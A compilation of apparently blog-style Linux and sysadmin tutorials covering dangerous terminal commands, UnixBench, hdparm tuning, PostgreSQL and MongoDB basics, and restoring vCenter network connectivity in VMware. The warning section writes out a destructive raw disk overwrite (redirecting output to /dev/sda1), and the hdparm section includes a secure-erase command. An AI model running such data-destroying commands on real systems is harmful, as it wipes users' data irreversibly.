Causing a Kernel Panic error in Linux is comparable to the dreaded blue screen of death in Windows, debunking the belief that Linux is infallible. Through certain commands, like redirecting random data to critical system devices or directly manipulating memory, Linux can be forced into a kernel panic state, making the system unrecoverable without a reboot. These commands are highly risky and can result in data loss or system corruption.

Overwriting the System Disk with the Output of a Command

Overwriting the hard drive in Linux, using commands that redirect the output of any Bash command directly to a disk device (such as /dev/sda), can result in total data loss. This process is irreversible and differs from formatting, as it involves writing raw data over the unit, making it unusable. It's a highly dangerous action with no practical benefit in most contexts.

An example of this would be:

command1 > /dev/sda1

Protect Your System, Protect Your Peace of Mind

Exploring and experimenting with Linux can be a rewarding and educational experience. However, it’s crucial to do so with knowledge and caution. The commands discussed here represent only a fraction of what is possible (and potentially dangerous) in the terminal. The golden rule is simple: if you’re not sure what a command does, research before executing it. Protecting your system is protecting your work, your memories, and ultimately, your peace of mind.
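A couple of defensive habits help with that golden rule. For example, assuming GNU coreutils, you can preview what a wildcard expands to before deleting, and ask rm to prompt before mass deletions:

# See exactly what the glob matches before running the real command
echo rm -rf ./build/*

# Prompt once before deleting more than three files or deleting recursively
alias rm='rm -I'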

 

 

Performance Testing in Linux with UnixBench

For Linux enthusiasts, conducting performance tests is key to getting the most out of their systems. UnixBench is an essential tool in this process, offering a detailed analysis of the performance of Linux and Unix systems.

What is UnixBench?

UnixBench is an open-source performance test suite designed for Unix and Linux systems. It is characterized by its ease of use and depth, allowing the performance of various system components to be measured.

Installation of UnixBench

The installation of UnixBench is simple and is carried out through a few commands in the terminal:
Clone the UnixBench repository:

git clone https://github.com/kdlucas/byte-unixbench.git

Access the UnixBench directory:

cd byte-unixbench/UnixBench

Compile and build UnixBench:

make

Running Your First Test with UnixBench

To launch your first test, follow these steps:
In the same UnixBench folder, execute:

./Run

This will start a series of tests that will evaluate different aspects of your system.

Analysis of Results

The results of UnixBench are presented in the form of scores and data, providing a clear idea of your system’s performance in areas such as CPU, memory, and disk operations.

Advanced Tests

UnixBench allows specific tests for different components. For example, to focus on the CPU:

./Run dhry2reg whetstone-double

Customizing Tests

UnixBench offers the flexibility to customize the tests. You can choose which tests to run and adapt them to your specific needs.
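For instance, the Run script accepts options such as -i (number of iterations) and -c (number of parallel copies, which can be given more than once to compare single-copy and multi-copy results in the same run); treat the exact flags as documented in the byte-unixbench README:

./Run -i 3 -c 1 -c 4 dhry2reg whetstone-double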

Real-Time Monitoring

While the tests are running, it is useful to perform real-time monitoring of the system using tools such as top or htop.

Network Performance Testing

In addition to the basic components, UnixBench can also evaluate your system’s network performance, a crucial aspect for servers or network-dependent environments.

Integration with Monitoring Tools

UnixBench can be integrated with advanced system monitoring tools, providing a detailed analysis of system performance during tests.

Tips for Optimizing Performance

After the tests, you can identify areas for improvement and start optimizing your system, adjusting configurations, updating hardware, or modifying the software environment.

The hdparm Utility: Tune Your Disk

Do you want to get the most out of your hard drive or SSD? hdparm is your tool. Created by Mark Lord, this Linux utility allows you to diagnose and optimize your disk, control its speed, manage power saving, and even securely erase SSDs.

Installation and Basic Usage

Most Linux distributions already include hdparm. To start, open a terminal and run:

 hdparm -I /dev/sda | more

This command will show you all the available information about your disk, including the model and firmware version.

Measuring Disk Speed

To know the data transfer speed of your disk, use:

 hdparm -t /dev/sda

Repeat the measurement several times to get an average. If you want to measure the pure speed of the disk, without the effect of the system buffer, use hdparm -t --direct /dev/sda. You can also specify an offset with hdparm -t --direct --offset 500 /dev/sda to test different areas of the disk.

Optimizing Data Transmission

To improve data transmission, hdparm allows you to adjust the number of sectors read at once with the command:

hdparm -m16 /dev/sda

This command configures the simultaneous reading of 16 sectors. Additionally, you can activate the “read-ahead” function with hdparm -a256 /dev/sda, which causes the disk to preemptively read 256 sectors.

Controlling 32-Bit Mode and Disk Noise

With hdparm -c /dev/sda, you can check if your disk is operating in 32-bit mode, and force this mode with -c3. If your disk is noisy, you can reduce the noise by activating the "acoustic mode" with hdparm -M 128 /dev/sda, or maximize speed with hdparm -M 254 /dev/sda.

Managing Write Cache

The command hdparm -W /dev/sda allows you to activate or deactivate the write cache, which can speed up data writing but at the risk of data loss in case of power cuts.

Setting Power Saving Mode

You can manage the disk’s power saving with hdparm -B255 /dev/sda to deactivate it, or use values between 1 and 254 for different levels of saving and performance. With hdparm -S 128 /dev/sda, you set the idle time before the disk enters sleep mode.

Cleaning SSDs

SSDs can accumulate residual data blocks. To clean them, use the script wiper.sh /dev/sda, but with caution, as it can lead to data loss.

Secure Erasure in SSDs

For securely erasing an SSD, hdparm offers the “secure erase” function with

hdparm --user-master u --security-erase 123456 /dev/sdb

This process completely removes data, but requires caution as it can render the SSD unusable in some cases.
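In practice, the ATA secure-erase procedure involves two preliminary steps (a sketch; 123456 is just a temporary password and /dev/sdb must be the correct drive): the drive must not appear as "frozen" in the hdparm -I output, and a security password has to be set immediately before issuing the erase:

sudo hdparm -I /dev/sdb | grep -i frozen
sudo hdparm --user-master u --security-set-pass 123456 /dev/sdb
sudo hdparm --user-master u --security-erase 123456 /dev/sdb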

Handling Old IDE Disks

For IDE disks, it is important to check and configure DMA with hdparm -d1 /dev/hda to improve data transfer. If you encounter problems, deactivate it with hdparm -d0 /dev/hda.

Maintaining Changes After Restarting

To ensure that changes made with hdparm persist after restarting, you must add them to the system startup scripts or, in Debian-based systems, in the /etc/hdparm.conf file.
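As an illustrative Debian-style snippet (option names follow the comments shipped in the stock /etc/hdparm.conf; the values are examples):

/dev/sda {
    write_cache = on
    apm = 128
    spindown_time = 120
    acoustic_management = 128
}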
Remember that this is a powerful tool and should be used with knowledge. Always make backups before making significant changes and consult specific documentation.

Introduction to PostgreSQL

Welcome to this article where I will introduce you to the world of PostgreSQL. Have you ever heard of this database management system? If your answer is no, or if you simply want to deepen your knowledge, you’ve come to the right place. Here, I will explain what PostgreSQL is, how to install it on Ubuntu, and how to manage a PostgreSQL instance from the console in a basic way.

What is PostgreSQL?

PostgreSQL is an open-source relational database management system (RDBMS). It is known for its robustness, its ability to handle large volumes of data, and its compliance with SQL standards. The great thing about PostgreSQL is that it not only allows you to work with relational data, but also supports JSON queries, which gives you a lot of flexibility.
This system is widely used in all kinds of applications, from small mobile applications to large database management systems for high-traffic websites. Its active community and constant development make it a very attractive option for developers and system administrators.

Installing PostgreSQL on Ubuntu

Installing PostgreSQL on Ubuntu is a fairly straightforward process. Ubuntu has PostgreSQL in its default repositories, making installation as easy as running a few commands in the terminal.
To start, open a terminal on your Ubuntu system and follow these steps:

  1. First, update your system’s package index with the command sudo apt update.
  2. Then, install the PostgreSQL package using sudo apt install postgresql postgresql-contrib. This command will install PostgreSQL along with some additional modules that are useful.

Once the installation is complete, the PostgreSQL service will automatically start on your system. To verify that PostgreSQL is running, you can use the command sudo systemctl status postgresql.

Basic Management of PostgreSQL from the Console

Now that you have PostgreSQL installed, it’s time to learn some basic commands to manage your database from the console.

Accessing PostgreSQL

PostgreSQL creates a default user named postgres. To start using PostgreSQL, you will need to switch to this user. You can do this with the command sudo -i -u postgres. Once this is done, you can access the PostgreSQL console with the command psql.

Creating a Database and a User

Creating a database and a user is fundamental to getting started. To create a new database, use the command CREATE DATABASE your_database_name;.
To create a new user, use the command CREATE USER your_user WITH PASSWORD 'your_password';. It’s important to choose a secure password.

Assigning Privileges

After creating your database and user, you’ll want to assign the necessary privileges to the user. This is done with the command GRANT ALL PRIVILEGES ON DATABASE your_database_name TO your_user;.

Basic Operations

With your database and user set up, you can begin to perform basic operations. Some of the most common include:

  • INSERT: To insert data into your tables.
  • SELECT: To read data.
  • UPDATE: To update existing data.
  • DELETE: To delete data.

These commands form the basis of the SQL language and will allow you to interact with your data effectively.
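For example, a minimal psql session putting these together might look like this (the table and values are purely illustrative):

CREATE TABLE people (id SERIAL PRIMARY KEY, name TEXT, age INT);
INSERT INTO people (name, age) VALUES ('Alice', 25);
SELECT * FROM people;
UPDATE people SET age = 26 WHERE name = 'Alice';
DELETE FROM people WHERE name = 'Alice';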

Managing Security in PostgreSQL

Security is crucial when it comes to databases. PostgreSQL offers several features to secure your data. One of them is connection encryption, which you can set up to secure communication between your application and the database.
It’s also important to regularly review and update your passwords, and to carefully manage user permissions to ensure that they only have access to what they need.

Maintenance and Performance

Maintaining your PostgreSQL database in good condition is vital to ensuring optimal performance. PostgreSQL comes with some tools that will help you in this task, like the VACUUM command, which helps clean up the database and recover space.
Additionally, it’s advisable to perform regular backups. You can use the pg_dump command to backup your database.
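For instance, running as a user with access to the database (the names are placeholders), a plain-SQL dump and its later restore would look like this:

pg_dump your_database_name > your_database_name.sql
psql your_database_name < your_database_name.sql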

Tips and Best Practices

To conclude, here are some tips and best practices that will help you get the most out of PostgreSQL:

  • Stay up-to-date with PostgreSQL updates to take advantage of improvements and security fixes.
  • Learn about indexes and how they can improve the performance of your queries.
  • Familiarize yourself with PostgreSQL’s monitoring tools to keep an eye on the performance and health of your database.

I hope this article has provided you with a good foundation on PostgreSQL. Although we have not reached a formal conclusion, I hope this content is the start of your journey in the world of databases with PostgreSQL. Good luck!

How to Get Started with MongoDB: Your Ultimate Guide

MongoDB is one of those terms that, if you are involved in software development or database management, you’ve surely heard over and over again. And not without reason, as its flexibility and power have revolutionized the way we store and retrieve data in the modern era. In this article, I’m going to walk you through what MongoDB is, how it differs from traditional SQL databases, how you can install it on Ubuntu and manage it from the console, and, of course, why setting up a cluster can be a great advantage for your projects.

What is MongoDB?

MongoDB is an open-source, document-oriented NoSQL database system that has gained popularity due to its ability to handle large volumes of data efficiently. Instead of tables, as in relational databases, MongoDB uses collections and documents. A document is a set of key-value pairs, which in the world of MongoDB is represented in a format called BSON (a binary version of JSON). This structure makes it very flexible and easy to scale, making it particularly suitable for modern web applications and handling data in JSON format, which is common in the development of web and mobile applications.

The Difference Between SQL and NoSQL

To better understand MongoDB, it is crucial to differentiate between SQL and NoSQL databases. SQL databases (such as MySQL, PostgreSQL, or Microsoft SQL Server) use a structured query language (SQL) and are based on a predefined data schema. This means that you must know in advance how your data will be structured and adhere to that structure, which offers a high degree of consistency and ACID transactions (Atomicity, Consistency, Isolation, and Durability).
On the other hand, NoSQL databases like MongoDB are schematically dynamic, allowing you to save documents without having to define their structure beforehand. They are ideal for unstructured or semi-structured data and offer horizontal scalability, which means you can easily add more servers to handle more load.
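To make the contrast concrete, here is an illustrative sketch (table, collection, and field names are invented for the example): the same record stored as a row in a SQL table with a fixed schema, and as a document inserted into a MongoDB collection with no prior schema definition:

-- SQL: the schema must exist before inserting
CREATE TABLE users (id SERIAL PRIMARY KEY, name TEXT, age INT);
INSERT INTO users (name, age) VALUES ('Alice', 25);

// MongoDB: the document is simply inserted; fields can vary between documents
db.users.insert({ name: "Alice", age: 25, interests: ["linux", "databases"] })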

Installing MongoDB on Ubuntu

Getting MongoDB up and running on your Ubuntu system is a fairly straightforward process, but it requires following some steps carefully. Here’s how to do it:

System Update

Before installing any new package, it is always good practice to update the list of packages and the software versions of your operating system with the following commands:

sudo apt update
sudo apt upgrade

Installing the MongoDB Package

Ubuntu has MongoDB in its default repositories, but to ensure you get the latest version, it is advisable to use the official MongoDB repository. Here’s how to set it up and carry out the installation:

sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv E52529D4
echo "deb [ arch=amd64,arm64 ] http://repo.mongodb.org/apt/ubuntu $(lsb_release -cs)/mongodb-org/4.4 multiverse" | sudo tee /etc/apt/sources.list.d/mongodb-org-4.4.list
sudo apt update
sudo apt install -y mongodb-org

Getting MongoDB Up and Running

Once installed, you can start the MongoDB server with the following command:

sudo systemctl start mongod

If you also want MongoDB to start automatically with the system, execute:

sudo systemctl enable mongod

Installation Verification

To verify that MongoDB is installed and running correctly, use:

sudo systemctl status mongod

Or you can try to connect to the MongoDB server using its shell:

mongo
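
If the shell opens, a couple of quick commands confirm that the server is responding. This is a minimal check assuming a default local installation; note that newer MongoDB releases replace the legacy mongo shell with mongosh, so the command may be mongosh on your system:

db.version()                             // reports the server version
db.runCommand({ connectionStatus: 1 })   // shows connection and authentication state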

Basic MongoDB Management from the Console

Now that you have MongoDB running on your Ubuntu machine, it’s time to learn some basic commands to manage your MongoDB instance from the console.

Creating and Using a Database

To create a new database, simply use the use command followed by the name of your database:

use myDatabase

If the database does not exist, MongoDB will create it when you save your first document.
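
Two shell helpers are handy at this point: db prints the database you are currently using, and show dbs lists the databases that already contain data (a database created with use only appears once it holds at least one document):

// Print the database you are currently using
db
// List databases that already contain at least one document
show dbs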

Inserting Data

To insert data into a collection, you can use the insert command. For example:

db.myCollection.insert({ name: "Alice", age: 25 })

This will add a new document to the collection myCollection.
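
The insert helper still works, but recent versions of the shell prefer the more explicit insertOne and insertMany. A quick sketch using the same hypothetical collection:

db.myCollection.insertOne({ name: "Bob", age: 30 })
db.myCollection.insertMany([
  { name: "Carol", age: 28 },
  { name: "Dave", age: 35 }
])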

Reading Data

You can read or search for documents in a collection with the find command. For example:

db.myCollection.find({ name: "Alice" })

This will search for all documents where the name is “Alice”.
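
find also accepts query operators and projections, which becomes useful as soon as your collections grow. For example, with the same sample data:

// Documents with age greater than 20, returning only the name field
db.myCollection.find({ age: { $gt: 20 } }, { name: 1, _id: 0 }).pretty()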

Updating Data

To update documents, you would use update. For example:

db.myCollection.update({ name: "Alice" }, { $set: { age: 26 } })

This will update Alice’s age to 26.
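
Keep in mind that update modifies only the first matching document by default; updateOne and updateMany make the intent explicit. For example:

// Update a single document
db.myCollection.updateOne({ name: "Alice" }, { $set: { age: 27 } })
// Update every document that matches the filter
db.myCollection.updateMany({ age: { $lt: 30 } }, { $inc: { age: 1 } })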

Deleting Data

And to delete documents, you simply use remove:

db.myCollection.remove({ name: "Alice" })

This will remove all documents where the name is “Alice”.
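
As with insert and update, remove is considered legacy in recent shells; deleteOne and deleteMany are the current equivalents:

db.myCollection.deleteOne({ name: "Alice" })     // removes the first match only
db.myCollection.deleteMany({ age: { $gt: 60 } }) // removes every match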

The Power of MongoDB Clusters

While managing a single instance of MongoDB may be sufficient for many projects, especially during development and testing phases, when it comes to production applications with large volumes of data or high availability requirements, setting up a MongoDB cluster can be essential. A cluster can distribute data across multiple servers, which not only provides redundancy and high availability but also improves the performance of read and write operations.
MongoDB clusters use sharding to distribute data horizontally and replica sets to ensure that data remains available even if part of the system fails. In another article, we will explore how to set up your own MongoDB cluster, but for now, it’s enough to know that this is a powerful feature that MongoDB offers to scale your application as it grows.
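
As a small taste of what replication looks like, on a mongod started with the --replSet option you can initialize a single-member replica set from the shell. This is only an illustrative sketch, not a production setup:

// Assumes mongod was started with: mongod --replSet rs0 ...
rs.initiate()   // creates a single-member replica set
rs.status()     // shows the state and role of each member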

As you delve into the world of MongoDB, you’ll find that there is much more to learn and explore. From its integration with different programming languages to the complexities of indexing and query performance, MongoDB offers a world of possibilities that can suit almost any modern application need.

Remember that mastering MongoDB takes time and practice, but starting with the basics will put you on the right track. Experiment with commands, try different configurations, and don’t be afraid to break things in a test environment; it’s the best way to learn. The flexibility and power of MongoDB await, and with the foundation you’ve built today, you are more than ready to start exploring. Let’s get to work!

Start vCenter with Connectivity from ESX when DVS is Not Working https://aprendeit.com/en/start-vcenter-with-connectivity-from-esx-when-dvs-is-not-working/ Tue, 31 Oct 2023 07:02:07 +0000

When working with virtual environments like VMware, one of the crucial components for management is vCenter, which acts as the brain of the virtual data center. Everything works wonderfully until, for some reason, we lose network connectivity in vCenter, and this is where things can get really complicated, especially if you are using Distributed Virtual Switches (DVS). In this article, I will guide you step by step on how to recover your vCenter and bring it back to life, even when all seems lost.

What Happens When vCenter Loses Network Connectivity?

The symptoms of this problem are quite clear:

  • The management network only exists on a DVS.
  • There are no ephemeral ports configured on the cluster.
  • vCenter loses network connectivity after an unplanned or planned outage.
  • You cannot reconnect vCenter to a DVS port group on the same hosts or on different ones.
  • You cannot open the vSphere client of vCenter to make changes to the network because the network connection of vCenter is down.

When you try to modify the network configuration on any ESXi host, or if you want to change the network adapters for an ESXi host connected to a DVS with non-ephemeral ports, you will encounter the following error:
“Adding or reconfiguring network adapters connected to non-ephemeral virtual distributed port groups is not supported.”

Causes of the Problem

If vCenter is connected to a Distributed Switch and loses access to the network, vCenter will not be able to connect to a distributed port because it does not have access to the ESXi hosts.
VMware recommends configuring ephemeral ports for the management network in your environment to prevent this problem from occurring again.

Impact and Risks

You should have at least two vmnics assigned to the management network, because in one of the steps we will remove a vmnic from the DVS management port group so that it can be used for the temporary Standard Switch.
WARNING: If the vmnics are in an LACP configuration, you will need to break it on the physical switch to avoid downtime. Follow this KB for steps on how to work with an LACP configuration.

If you do not have two vmnics on the ESXi host, it is recommended that you follow these steps from the DCUI Shell; otherwise, you will lose SSH access as soon as you run the vmnic removal command and will not be able to continue with the process.

Step by Step Solution

Step 1: Remove a vmnic located in the DVS connected to the Management Network
Identify the port ID where the vmnic you want to remove is connected to the DVS:

# esxcli network vswitch dvs vmware list | egrep "Client: vmnic#" -A3

The output will be similar to:

# esxcli network vswitch dvs vmware list | egrep "Client: vmnic1" -A3
Client: vmnic1
DVPortgroup ID: dvportgroup-5008
In Use: true
Port ID: 12

Remove the vmnic:

# esxcfg-vswitch -Q vmnic# -V PortID DVSName

Example using vmnic1, Port ID 12, and DVS Name ProdSwitchDVS:

# esxcfg-vswitch -Q vmnic1 -V 12 ProdSwitchDVS

Step 2: Create a Standard Switch, a Portgroup, and Add the vmnic to the Standard Switch

Create a Standard switch:

# esxcli network vswitch standard add --vswitch-name=vSwitchName

Create a Portgroup:

# esxcli network vswitch standard portgroup add --portgroup-name=PortgroupName --vswitch-name=vSwitchName

Add a vmnic to the Standard Switch:

# esxcli network vswitch standard uplink add --uplink-name=vmnic --vswitch-name=vSwitchName
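
Putting the three commands together with example values (vSwitchTemp, PG-Mgmt-Temp, and vmnic1 are hypothetical names; substitute the ones from your environment):

# Example only: temporary standard switch reusing the vmnic freed in Step 1
esxcli network vswitch standard add --vswitch-name=vSwitchTemp
esxcli network vswitch standard portgroup add --portgroup-name=PG-Mgmt-Temp --vswitch-name=vSwitchTemp
esxcli network vswitch standard uplink add --uplink-name=vmnic1 --vswitch-name=vSwitchTemp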

Step 3: Recover Network Connectivity of the vCenter Virtual Machine

First, we will connect the vCenter virtual machine to the newly created Portgroup of the Standard Switch. This will help to recover access to vCenter’s network, allowing the ESXi hosts to reconnect to the vCenter server, and you will be able to manage your infrastructure again.

  • Log in to the ESXi vSphere client with administrator credentials.
  • Go to “Virtual Machines”.
  • Select the vCenter virtual machine.
  • Click “Actions” > “Edit Settings”.
  • Connect Network Adapter 1 to the newly created Portgroup of the Standard Switch.
  • Click Save.

At this point, you should have recovered the network connectivity of vCenter and you should now be able to connect to its vSphere client. If you still can’t, make sure that the Portgroup of the Standard Switch has the correct VLAN and MTU configuration.
Once you have verified that everything is fine in your vCenter inventory, migrate vCenter back to the DVS to have the same configuration as before the outage.
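
Before migrating back, if you need to adjust the VLAN or MTU of the temporary portgroup and switch from the command line, esxcli can do that as well (the names and values below are placeholders):

# Tag the temporary portgroup with the management VLAN (replace 100 with your VLAN ID)
esxcli network vswitch standard portgroup set --portgroup-name=PG-Mgmt-Temp --vlan-id=100
# Match the MTU of the original DVS if it uses jumbo frames
esxcli network vswitch standard set --vswitch-name=vSwitchTemp --mtu=9000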

Step 4: Migrate the vmnic Back to the DVS

Now, let’s return the vmnic to the DVS by following these steps:

  • If you have not logged in to the vCenter vSphere client, log in with administrator credentials.
  • Go to the “Networking” tab.
  • Right-click on the DVS and select “Add and Manage Hosts”.
  • Select “Manage the host networking” and click Next.
  • Click on “Attached hosts…”.
  • Select the ESXi host with the vmk and vmnic that you want to add back to the DVS and click OK.
  • Click Next.
  • In the “Management Networks” list, select the vmk and click “Assign” to assign it to the desired management port group. Click Next.
  • In the “Physical Adapters” list, select the vmnic and click “Assign” to assign it to the DVS. Click Next.
  • Click Next and then Finish.

Step 5: Migrate vCenter Back to the DVS

  • Go to “Virtual Machines”.
  • Select the vCenter virtual machine.
  • Click “Actions” > “Edit Settings”.
  • Change Network Adapter 1 back to the original DVS port group.
  • Click Save.

Step 6: Remove the Temporary Standard Switch and Portgroup

Remove the Portgroup from the Standard Switch:

esxcli network vswitch standard portgroup remove --portgroup-name=PortgroupName --vswitch-name=vSwitchName

Remove the vmnic from the Standard Switch:

esxcli network vswitch standard uplink remove --uplink-name=vmnic --vswitch-name=vSwitchName

Remove the Standard Switch:

esxcli network vswitch standard remove --vswitch-name=vSwitchName
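
As a final check, you can list the standard switches that remain on the host to confirm the temporary one is gone:

esxcli network vswitch standard list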

Conclusion

This process, though complex and meticulous, can save the day when vCenter is down due to a network issue. Having a proper backup and understanding the VMware infrastructure and its dependencies are key to a successful recovery. It is highly recommended to have a plan for scenarios like this and to make sure the team managing the infrastructure is familiar with these procedures, so that recovery is quick and smooth when it is needed.
